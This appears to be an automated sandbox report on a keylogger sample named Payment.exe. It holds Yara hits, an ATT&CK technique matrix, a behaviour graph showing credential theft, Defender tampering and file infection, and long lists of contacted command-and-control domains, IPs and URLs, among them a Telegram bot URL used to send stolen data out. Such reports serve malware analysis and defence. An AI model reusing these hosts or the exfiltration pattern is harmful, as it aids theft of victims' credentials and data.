                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2138445632.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2150772680.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2150258037.0000000004A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts22
                  Native API
                  2
                  LSASS Driver
                  1
                  Abuse Elevation Control Mechanism
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  1
                  Taint Shared Content
                  1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  2
                  LSASS Driver
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Windows Service
                  1
                  DLL Side-Loading
                  1
                  Abuse Elevation Control Mechanism
                  Security Account Manager3
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  21
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job
                  1
                  Windows Service
                  4
                  Obfuscated Files or Information
                  NTDS233
                  System Information Discovery
                  Distributed Component Object ModelInput Capture4
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script111
                  Process Injection
                  12
                  Software Packing
                  LSA Secrets131
                  Security Software Discovery
                  SSHKeylogging15
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job
                  1
                  Timestomp
                  Cached Domain Credentials1
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync41
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
                  Masquerading
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                  Process Injection
                  Network Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1662149 Sample: Payment.exe Startdate: 10/04/2025 Architecture: WINDOWS Score: 100 64 reallyfreegeoip.org 2->64 66 api.telegram.org 2->66 68 54 other IPs or domains 2->68 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 86 14 other signatures 2->86 8 Payment.exe 7 2->8         started        12 jwBqGZseW.exe 2->12         started        14 elevation_service.exe 2->14         started        16 20 other processes 2->16 signatures3 82 Tries to detect the country of the analysis system (by using the IP) 64->82 84 Uses the Telegram API (likely for C&C communication) 66->84 process4 dnsIp5 52 C:\Users\user\AppData\Roaming\jwBqGZseW.exe, PE32 8->52 dropped 54 C:\Users\...\jwBqGZseW.exe:Zone.Identifier, ASCII 8->54 dropped 56 C:\Users\user\AppData\Local\...\tmp18CE.tmp, XML 8->56 dropped 58 C:\Users\user\AppData\...\Payment.exe.log, ASCII 8->58 dropped 98 Uses schtasks.exe or at.exe to add and modify task schedules 8->98 100 Adds a directory exclusion to Windows Defender 8->100 102 Injects a PE file into a foreign processes 8->102 19 Payment.exe 15 3 8->19         started        24 powershell.exe 23 8->24         started        26 powershell.exe 23 8->26         started        32 2 other processes 8->32 28 jwBqGZseW.exe 12->28         started        30 schtasks.exe 12->30         started        60 C:\Windows\System32\sppsvc.exe, PE32+ 14->60 dropped 104 Infects executable files (exe, dll, sys, html) 14->104 106 Found direct / indirect Syscall (likely to bypass EDR) 14->106 62 127.0.0.1 unknown unknown 16->62 108 Creates files inside the volume driver (system volume information) 16->108 110 Creates files in the system32 config directory 16->110 112 Found evasive API chain (may stop execution after checking volume information) 16->112 114 2 other signatures 16->114 file6 signatures7 process8 dnsIp9 70 api.telegram.org 149.154.167.220, 443, 49722, 49753 TELEGRAMRU United Kingdom 19->70 72 reallyfreegeoip.org 104.21.64.1, 443, 49685, 49686 CLOUDFLARENETUS United States 19->72 74 21 other IPs or domains 19->74 44 C:\Windows\System32\wbengine.exe, PE32+ 19->44 dropped 46 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 19->46 dropped 48 C:\Windows\System32\vds.exe, PE32+ 19->48 dropped 50 138 other malicious files 19->50 dropped 88 Tries to steal Mail credentials (via file / registry access) 19->88 90 Drops executable to a common third party application directory 19->90 92 Infects executable files (exe, dll, sys, html) 19->92 94 Loading BitLocker PowerShell Module 24->94 34 conhost.exe 24->34         started        36 WmiPrvSE.exe 24->36         started        38 conhost.exe 26->38         started        96 Tries to harvest and steal browser information (history, passwords, etc) 28->96 40 conhost.exe 30->40         started        42 conhost.exe 32->42         started        file10 signatures11 process12

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Payment.exe42%VirustotalBrowse
                  Payment.exe47%ReversingLabsWin32.Spyware.Snakekeylogger
                  SAMPLE100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  76899.bodis.com
                  199.59.243.228
                  truefalse
                    parkingpage.namecheap.com
                    91.195.240.19
                    truefalse
                      vjaxhpbji.biz
                      82.112.184.197
                      truefalse
                        pywolwnvd.biz
                        52.11.240.239
                        truefalse
                          ytctnunms.biz
                          54.85.87.184
                          truefalse
                            lrxdmhrr.biz
                            52.11.240.239
                            truefalse
                              vrrazpdh.biz
                              52.26.80.133
                              truefalse
                                tbjrpv.biz
                                34.245.175.187
                                truefalse
                                  084725.parkingcrew.net
                                  13.248.148.254
                                  truefalse
                                    xlfhhhm.biz
                                    54.169.144.97
                                    truetrue
                                      npukfztj.biz
                                      3.229.117.57
                                      truetrue
                                        anpmnmxo.biz
                                        192.64.119.165
                                        truefalse
                                          sxmiywsfv.biz
                                          18.142.91.111
                                          truefalse
                                            przvgke.biz
                                            72.52.178.23
                                            truefalse
                                              dwrqljrr.biz
                                              52.11.240.239
                                              truefalse
                                                gytujflc.biz
                                                208.117.43.225
                                                truefalse
                                                  gvijgjwkh.biz
                                                  54.85.87.184
                                                  truefalse
                                                    gnqgo.biz
                                                    34.229.166.50
                                                    truefalse
                                                      reallyfreegeoip.org
                                                      104.21.64.1
                                                      truetrue
                                                        deoci.biz
                                                        34.229.166.50
                                                        truefalse
                                                          iuzpxe.biz
                                                          18.142.91.111
                                                          truefalse
                                                            checkip.dyndns.com
                                                            132.226.8.169
                                                            truefalse
                                                              nqwjmb.biz
                                                              52.43.119.120
                                                              truefalse
                                                                wllvnzb.biz
                                                                13.213.51.196
                                                                truefalse
                                                                  cvgrf.biz
                                                                  52.11.240.239
                                                                  truefalse
                                                                    lpuegx.biz
                                                                    82.112.184.197
                                                                    truefalse
                                                                      bumxkqgxu.biz
                                                                      3.229.117.57
                                                                      truetrue
                                                                        vcddkls.biz
                                                                        13.213.51.196
                                                                        truefalse
                                                                          vyome.biz
                                                                          52.26.80.133
                                                                          truefalse
                                                                            dlynankz.biz
                                                                            85.214.228.140
                                                                            truefalse
                                                                              oshhkdluh.biz
                                                                              52.11.240.239
                                                                              truefalse
                                                                                jpskm.biz
                                                                                52.26.80.133
                                                                                truefalse
                                                                                  ftxlah.biz
                                                                                  54.169.144.97
                                                                                  truetrue
                                                                                    ifsaia.biz
                                                                                    18.142.91.111
                                                                                    truefalse
                                                                                      jhvzpcfg.biz
                                                                                      3.229.117.57
                                                                                      truetrue
                                                                                        saytjshyf.biz
                                                                                        3.229.117.57
                                                                                        truetrue
                                                                                          fwiwk.biz
                                                                                          72.52.178.23
                                                                                          truefalse
                                                                                            typgfhb.biz
                                                                                            18.142.91.111
                                                                                            truefalse
                                                                                              esuzf.biz
                                                                                              52.26.80.133
                                                                                              truefalse
                                                                                                myups.biz
                                                                                                165.160.13.20
                                                                                                truefalse
                                                                                                  yauexmxk.biz
                                                                                                  34.229.166.50
                                                                                                  truefalse
                                                                                                    ssbzmoy.biz
                                                                                                    13.213.51.196
                                                                                                    truefalse
                                                                                                      knjghuig.biz
                                                                                                      13.213.51.196
                                                                                                      truefalse
                                                                                                        yunalwv.biz
                                                                                                        208.117.43.225
                                                                                                        truefalse
                                                                                                          brsua.biz
                                                                                                          52.212.150.54
                                                                                                          truefalse
                                                                                                            qaynky.biz
                                                                                                            18.142.91.111
                                                                                                            truefalse
                                                                                                              qpnczch.biz
                                                                                                              52.26.80.133
                                                                                                              truefalse
                                                                                                                acwjcqqv.biz
                                                                                                                13.213.51.196
                                                                                                                truefalse
                                                                                                                  api.telegram.org
                                                                                                                  149.154.167.220
                                                                                                                  truetrue
                                                                                                                    ww7.przvgke.biz
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      ww12.fwiwk.biz
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        checkip.dyndns.org
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          uhxqin.biz
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            zlenh.biz
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              lejtdj.biz
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                www.anpmnmxo.biz
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                                                  http://qaynky.biz/dpyksfalse
                                                                                                                                    http://ww12.fwiwk.biz/wjuw?usid=27&utid=12022910910false
                                                                                                                                      http://gvijgjwkh.biz/polgcwglclfalse
                                                                                                                                        http://acwjcqqv.biz/xqjffalse
                                                                                                                                          http://esuzf.biz/aryafalse
                                                                                                                                            http://ytctnunms.biz/aefalse
                                                                                                                                              http://vyome.biz/mxcqktbjvfalse
                                                                                                                                                http://vcddkls.biz/hfalse
                                                                                                                                                  http://pywolwnvd.biz/uoiagfalse
                                                                                                                                                    http://vrrazpdh.biz/hlrrkhfalse
                                                                                                                                                      http://oflybfv.biz/kqufyotrue
                                                                                                                                                        http://oshhkdluh.biz/gyylxsfalse
                                                                                                                                                          http://przvgke.biz/rfalse
                                                                                                                                                            http://www.anpmnmxo.biz/ikcoxctprhexiycpfalse
                                                                                                                                                              http://vcddkls.biz/rfalse
                                                                                                                                                                http://ww7.fwiwk.biz/qvxayygldfupog?usid=27&utid=12022910102false
                                                                                                                                                                  http://brsua.biz/ayuhmcmfalse
                                                                                                                                                                    http://dlynankz.biz/kxrifalse
                                                                                                                                                                      http://przvgke.biz/ktfalse
                                                                                                                                                                        http://myups.biz/ipjfalse
                                                                                                                                                                          http://jhvzpcfg.biz/tcvwahikyjxgoutrue
                                                                                                                                                                            http://dwrqljrr.biz/pwmdxjfalse
                                                                                                                                                                              http://cvgrf.biz/tmcvwhhegsrpvxfalse
                                                                                                                                                                                http://esuzf.biz/stsqeigbafalse
                                                                                                                                                                                  http://fwiwk.biz/ccomsfalse
                                                                                                                                                                                    http://deoci.biz/nutsjjvailxyuusufalse
                                                                                                                                                                                      http://ssbzmoy.biz/tmpfalse
                                                                                                                                                                                        http://vyome.biz/hmjljoygmefalse
                                                                                                                                                                                          http://sxmiywsfv.biz/ljgqqouxyfalse
                                                                                                                                                                                            http://pywolwnvd.biz/bxahccuchxrahyifalse
                                                                                                                                                                                              http://xlfhhhm.biz/wcdojufdhlutrue
                                                                                                                                                                                                http://ww7.przvgke.biz/ryyftbrdpkr?usid=27&utid=12022893059false
                                                                                                                                                                                                  http://iuzpxe.biz/rrkpugwxhmifalse
                                                                                                                                                                                                    http://knjghuig.biz/qcmfalse
                                                                                                                                                                                                      http://iuzpxe.biz/kxovwpejbxujiefalse
                                                                                                                                                                                                        http://sxmiywsfv.biz/gfoywiqgfalse
                                                                                                                                                                                                          http://www.anpmnmxo.biz/ovyjaqfalse
                                                                                                                                                                                                            http://gvijgjwkh.biz/ssxhfalse
                                                                                                                                                                                                              http://typgfhb.biz/tknftufalse
                                                                                                                                                                                                                http://cvgrf.biz/ncuqcjjolokpylyfalse
                                                                                                                                                                                                                  http://wllvnzb.biz/ayfalse
                                                                                                                                                                                                                    http://yauexmxk.biz/ouxosbeufalse
                                                                                                                                                                                                                      http://ww7.przvgke.biz/r?usid=27&utid=12022892926false
                                                                                                                                                                                                                        http://yunalwv.biz/lpjrtgtrcjfalse
                                                                                                                                                                                                                          http://knjghuig.biz/afalse
                                                                                                                                                                                                                            http://acwjcqqv.biz/fktafvxejaukfalse
                                                                                                                                                                                                                              http://brsua.biz/uqgubhowqkworyccfalse
                                                                                                                                                                                                                                http://jhvzpcfg.biz/pjrcxvgcrciphjtrue
                                                                                                                                                                                                                                  http://ww7.fwiwk.biz/ccoms?usid=27&utid=12022910001false
                                                                                                                                                                                                                                    http://tbjrpv.biz/idmrbxilfalse
                                                                                                                                                                                                                                      http://yunalwv.biz/buvxjxfalse
                                                                                                                                                                                                                                        http://saytjshyf.biz/paucmhgtrue
                                                                                                                                                                                                                                          http://dlynankz.biz/unklgjihfthcfalse
                                                                                                                                                                                                                                            http://ifsaia.biz/aivpwrjbclkvifalse
                                                                                                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                              http://82.112.184.197/sdhhalsoPayment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://duckduckgo.com/ac/?q=jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  http://34.229.166.50/Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    http://85.214.228.140/unklgjihfthcPayment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      https://scss.adobesc.cominvalidAnnotIdListAdobeCollabSync.exe.8.drfalse
                                                                                                                                                                                                                                                        https://scss.adobesc.comreasoncom.adobe.review.sdkAdobeCollabSync.exe.8.drfalse
                                                                                                                                                                                                                                                          https://chrome.google.com/webstore?hl=enlBLrjwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            http://brsua.biz/dPayment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment.exe, 00000000.00000002.899266087.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000012.00000002.1037469944.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                http://18.142.91.111/Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  http://52.11.240.239/pwmdxjPayment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    http://52.43.119.120/cgdwvsjPayment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFListAdobeCollabSync.exe.8.drfalse
                                                                                                                                                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          http://crl.ver)svchost.exe, 0000002B.00000002.2143386918.0000019D59200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            http://checkip.dyndns.orgjwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              http://85.214.228.140/Payment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                https://reallyfreegeoip.orgPayment.exe, 00000008.00000002.2150772680.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A94000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  http://85.214.228.140/htdxfxsikhflmhhjPayment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    https://gemini.google.com/app?q=jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      http://52.26.80.133/0?Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        http://82.112.184.197/Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          http://gnqgo.biz/H$Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            http://3.229.117.57/Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              http://qpnczch.biz//Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.comAdobeCollabSync.exe.8.drfalse
                                                                                                                                                                                                                                                                                                  http://52.26.80.133:80/klwkdohmlimacmerPayment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icojwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      https://scss.adobesc.comAdobeCollabSync.exe.8.drfalse
                                                                                                                                                                                                                                                                                                        http://18.142.91.111/oqljmnqcm4Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                          https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/comAdobeCollabSync.exe.8.drfalse
                                                                                                                                                                                                                                                                                                            https://scss.adobesc.comemptyAnnotationsAdobeCollabSync.exe.8.drfalse
                                                                                                                                                                                                                                                                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.AdobeCollabSync.exe.8.drfalse
